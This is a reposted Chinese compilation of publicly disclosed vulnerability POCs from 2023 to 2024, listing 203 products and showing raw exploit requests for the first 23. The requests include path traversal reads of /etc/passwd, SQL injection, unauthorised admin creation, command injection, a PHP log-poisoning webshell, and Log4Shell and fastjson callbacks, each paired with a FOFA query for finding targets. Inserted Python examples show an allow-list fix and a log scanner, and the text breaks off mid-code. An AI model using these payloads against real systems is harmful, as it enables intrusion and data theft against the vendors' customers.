Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defense. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites and compiled and published by the 网络安全新视界 team.

Patches: all of these vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: owing to length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Notice

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for the keyword you need.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password leak
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archive and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in the previous step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=<payload> HTTP/1.1
Host: x.x.x.x

The payload is the following statement, URL-encoded twice:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Then send the POST request; the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

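The HFOffice request above passes a JSON `sorts` array whose `Field` value ends up in the query's ORDER BY clause, and the POC exploits that by supplying a SQL expression (`1-CONVERT(...)`) where a column name is expected. The Python below is an example added here, not code from the article or from any vendor product: it puts the injectable shape next to the usual fix, an allow-list that maps client-supplied sort names to known columns (ORDER BY cannot take a bind parameter, so the allow-list is what keeps attacker text out of the SQL). The `records` table, its rows and all function names are constructed for the demonstration; SQLite stands in for the real database, so the expression `1-id` plays the role of the POC's `1-CONVERT(...)`.

```python
import json
import sqlite3

# Constructed sample table standing in for the application's data; not the product's schema.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE records (id INTEGER PRIMARY KEY, name TEXT, created TEXT)")
    conn.executemany(
        "INSERT INTO records VALUES (?, ?, ?)",
        [(1, "alpha", "2024-01-01"), (2, "beta", "2024-02-01"), (3, "gamma", "2024-03-01")],
    )
    return conn

def list_vulnerable(conn: sqlite3.Connection, sorts_param: str) -> list:
    """Injectable shape: the client's Field string is pasted into ORDER BY verbatim,
    so 'name' sorts by the column while '1-id' (or any SQL expression) is evaluated."""
    sorts = json.loads(sorts_param)
    order_by = ", ".join(item["Field"] for item in sorts)
    sql = f"SELECT id, name FROM records ORDER BY {order_by}"
    return [row[1] for row in conn.execute(sql)]

# The only sort keys the endpoint is meant to support, mapped to real column names.
ALLOWED_SORT_FIELDS = {"id": "id", "name": "name", "created": "created"}

def validate_sorts(sorts_param: str) -> list:
    """Parse the sorts JSON and return column names, refusing anything off the allow-list."""
    sorts = json.loads(sorts_param)
    columns = []
    for item in sorts:
        field = item.get("Field") if isinstance(item, dict) else None
        if field not in ALLOWED_SORT_FIELDS:
            raise ValueError(f"unsupported sort field: {field!r}")
        columns.append(ALLOWED_SORT_FIELDS[field])
    return columns or ["id"]

def sort_request_is_valid(sorts_param: str) -> bool:
    """True when validate_sorts accepts the request; shows the injected value being refused."""
    try:
        validate_sorts(sorts_param)
        return True
    except (ValueError, TypeError):   # json.JSONDecodeError is a ValueError
        return False

def list_hardened(conn: sqlite3.Connection, sorts_param: str) -> list:
    """Hardened shape: only allow-listed column names ever reach the query text."""
    sql = "SELECT id, name FROM records ORDER BY " + ", ".join(validate_sorts(sorts_param))
    return [row[1] for row in conn.execute(sql)]

if __name__ == "__main__":
    db = make_db()
    benign = '[{"Field":"name"}]'
    injected = '[{"Field":"1-id"}]'   # same shape as the POC's 1-CONVERT(...) expression
    print("vulnerable, benign  :", list_vulnerable(db, benign))
    print("vulnerable, injected:", list_vulnerable(db, injected))
    print("hardened,   benign  :", list_hardened(db, benign))
    print("hardened,   injected accepted?", sort_request_is_valid(injected))
```

Running it shows the vulnerable handler returning the rows in reverse order for the `1-id` input, proof that the client's arithmetic was evaluated by the database, while the hardened handler rejects the same request before any SQL is built.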
17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

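Several POCs in this list share a handful of request shapes that a defender can look for in web-server or proxy logs: percent-encoded traversal (`/static/../..`, item 2), path-matrix suffixes and dot-segments used to slip past Spring URL matching (`getAllList;.ico` and `a.ico/../getAllList`, items 14 and 15), double-URL-encoded SQL functions (`extractvalue`, item 9; `waitfor delay`, item 26), Log4Shell `${jndi:` lookups (item 22) and fastjson `@type` autotype markers (items 21 and 23). The Python below is an example added here, not part of the article: it percent-decodes a request target until it stops changing, canonicalises the path, and tags those indicators. The regexes, the log-line format and the sample log entries are constructed for the demonstration and are not a vendor signature set.

```python
from __future__ import annotations

import posixpath
import re
from urllib.parse import unquote_plus

# Indicator patterns modelled on the POC shapes above (constructed regexes): error/time-based
# SQLi functions, Log4Shell lookups, fastjson autotype markers and path-matrix segments.
SQLI_RE = re.compile(r"extractvalue\s*\(|updatexml\s*\(|waitfor\s+delay|hashbytes\s*\(|@@version", re.I)
JNDI_RE = re.compile(r"\$\{jndi:", re.I)
FASTJSON_RE = re.compile(r'"@type"\s*:\s*"(?:com\.alibaba\.fastjson\.JSONObject|java\.net\.URL)"', re.I)
MATRIX_RE = re.compile(r";[^/]*")          # ';.ico' or ';stok=...' inside a path segment
# Common/combined log format: method and request target sit inside the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so double-encoded payloads
    (as in the 稻壳CMS POC) are inspected in the form the backend finally sees."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s

def normalize_path(target: str) -> str:
    """Canonical path: decoded, matrix parameters stripped, '.' and '..' resolved."""
    path = fully_decode(target.partition("?")[0])
    path = MATRIX_RE.sub("", path)
    return posixpath.normpath("/" + path.lstrip("/"))

def inspect_request(target: str, body: str = "") -> list[str]:
    """Return sorted indicator tags for one request target and optional body."""
    tags = set()
    decoded_target = fully_decode(target)
    raw_path = decoded_target.partition("?")[0]
    if "/.." in raw_path or raw_path.startswith(".."):
        tags.add("path-traversal")
    if MATRIX_RE.search(raw_path):
        tags.add("matrix-param")
    if SQLI_RE.search(decoded_target) or SQLI_RE.search(body):
        tags.add("sqli")
    for blob in (decoded_target, body):
        if JNDI_RE.search(blob):
            tags.add("jndi-lookup")
        if FASTJSON_RE.search(blob):
            tags.add("fastjson-autotype")
    return sorted(tags)

def scan_access_log(lines) -> list[tuple[str, list[str]]]:
    """Run inspect_request over access-log lines; returns (canonical path, tags) per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        tags = inspect_request(m["target"])
        if tags:
            hits.append((normalize_path(m["target"]), tags))
    return hits

# Constructed access-log lines echoing the POC shapes on this page (sample data).
SAMPLE_LOG = [
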